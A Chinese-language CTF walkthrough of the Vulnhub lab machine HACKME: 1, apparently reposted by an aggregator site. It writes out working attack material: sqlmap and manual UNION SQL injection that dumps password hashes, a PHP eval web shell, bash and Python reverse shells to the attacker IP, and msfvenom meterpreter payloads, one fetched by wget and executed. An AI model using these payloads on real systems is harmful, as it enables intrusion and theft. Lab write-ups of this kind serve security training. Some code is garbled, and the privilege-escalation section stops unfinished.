(Vulnhub练习)-- HACKME: 1渗透实战

Posted 肖萧然

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了(Vulnhub练习)-- HACKME: 1渗透实战相关的知识,希望对你有一定的参考价值。

(Vulnhub练习)-- HACKME: 1渗透实战


下载地址

https://www.vulnhub.com/entry/hackme-1,330/

扫描主机

netdiscover -i eth0 -r 192.168.100.0/24

目标主机IP:192.168.100.134

信息收集

信息收集的步骤基本上差不多,可根据工具简单写个shell脚本

#!/usr/bin/bash

ip=192.168.100.$1

ping -c2 $ip &>/dev/null  
if [ $? -eq 0 ] ; then 
		echo "$ip is up"
	else 
			echo "$ip is down"
			    exit
fi

masscan --rate=10000 --ports 0-65535 $ip 
masscan --rate=10000 --ports 0-65535 $ip 
nmap -A $ip
sleep 30
whatweb $ip 
sleep 10
dirsearch  -u  $ip 
sleep 5
nikto -h $ip 
sleep 5
dirb http://$ip 

我的网段在192.168.100.0/24 所以ip要改改

 /home/xiaoxiaoran/shell/xinxi.sh 134

nmap端口扫描

指纹识别

路径扫描

开始测试

主页发现登录页面,而且还可以注册用户

注册用户admin 密码123456 登录admin用户

SQL注入

sqlmap

sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms --batch
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms --batch --current-db
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms --batch -D webapphacking --tables
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms --batch -D webapphacking -T users --columns
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms -D webapphacking -T users -C user,name,pasword --dump
         

手工注入

//验证sql注入
Windows OS' and 1=1#

//验证sql注入
Windows OS' and 1=2# 

//判断字段数
Windows OS' order by 3#

//判断字段数
Windows OS' order by 4#

//判断显示位置
-1' union select 1,2,3#

//查看当前数据库
-1' union select database(),2,3#

//查看webapphacking库所有的表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

//查看users表中所有的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

//查看表中user,password
-1' union select group_concat(user),group_concat(pasword),3 from users#

superadmin用户登录

用户名superadmin ,密码Uncrackable(md5破解的)

文件上传

没有任何限制

直接一句话木马上传

<?php @eval($_POST[1]);

路径在 信息收集时就有扫到

拿到shell(四种方法总结)

kali ip 为 192.168.100.133

nc_shell反弹shell

1.php文件

<?php system("echo 'bash -i >& /dev/tcp/192.168.100.133/1234 0>&1' | bash");?>

服务端监听

nc -nvlp 1234

客户端实现

上传 1.php 并访问

效果

nc_python反弹shell

1.py文件

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.100.133",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

服务端监听

nc -nvlp 1234

客户端实现

蚁剑终端执行 python 1.py

效果

msf_php反弹shell

msfvenom生成木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=8080

2.php文件

/*<?php /**/ error_reporting(0); $ip = '192.168.100.133'; $port = 8080; if (($f = 'stream_socket_client') && is_callable($f))  $s = $f("tcp://$ip:$port"); $s_type = 'stream';  if (!$s && ($f = 'fsockopen') && is_callable($f))  $s = $f($ip, $port); $s_type = 'stream';  if (!$s && ($f = 'socket_create') && is_callable($f))  $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res)  die();  $s_type = 'socket';  if (!$s_type)  die('no socket funcs');  if (!$s)  die('no socket');  switch ($s_type)  case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break;  if (!$len)  die();  $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len)  switch ($s_type)  case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break;   $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))  $suhosin_bypass=create_function('', $b); $suhosin_bypass();  else  eval($b);  die();


php.rc文件

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.100.133
set LPORT 8080
exploit

服务端监听

 msfconsole  -qr /home/xiaoxiaoran/shell/php.rc       

客户端实现

上传 2.php 并访问

效果

msf_linux反弹shell

msfvenom生成木马

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=4444 -b "\\x00" -i 10 -f elf -o  /var/www/html/linux_shell

3.php文件

<?php system("wget 192.168.100.133/linux_shell -O /tmp/xiao3;cd /tmp;chmod +x xiao3;./xiao3 &")?>

linux.rc文件

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.100.133
set LPORT 4444
exploit

服务端监听

msfconsole  -qr /home/xiaoxiaoran/shell/linux.rc  

客户端实现

上传 3.php 并访问

效果

提权

将shell转换为交互式的tty

python -c 'import pty;pty.spawn("/bin/bash")'  

在/home/legacy路径下发现二进制文件touchmenot

原理


LINUX中除了r w x 三个权限外(分别代表r 读,w 写,x 执行),其实还有两个特殊的权限s 跟t

当s权限在文件所有者 x 权限上时,例如:-rwsr-xr-x,此时称为Set UID,简称为SUID的特殊权限,

即当执行该文件时将具有该文件所有者的权限

还有一个t权限,Sticky Bit,简称为SBIT权限,只针对目录有效。


以上是关于(Vulnhub练习)-- HACKME: 1渗透实战的主要内容,如果未能解决你的问题,请参考以下文章

靶机渗透HACKME: 1

靶机渗透HACKME: 1

靶机渗透 hackme-1(详解,适合新手)

(Vulnhub练习)-- DC: 8渗透实战

靶机渗透 HACKME-2 (详细渗透,适合新手渗透)

vulnhub sar 靶场练习